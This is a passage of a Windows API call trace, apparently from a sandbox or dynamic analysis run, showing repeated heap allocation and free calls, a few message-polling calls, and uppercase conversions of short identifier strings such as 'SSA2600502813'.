[0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0090.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0090.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0090.345] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0090.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0090.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.347] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0090.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.349] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0090.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0090.349] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0090.350] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0090.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0090.350] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0090.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.352] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.352] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0090.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 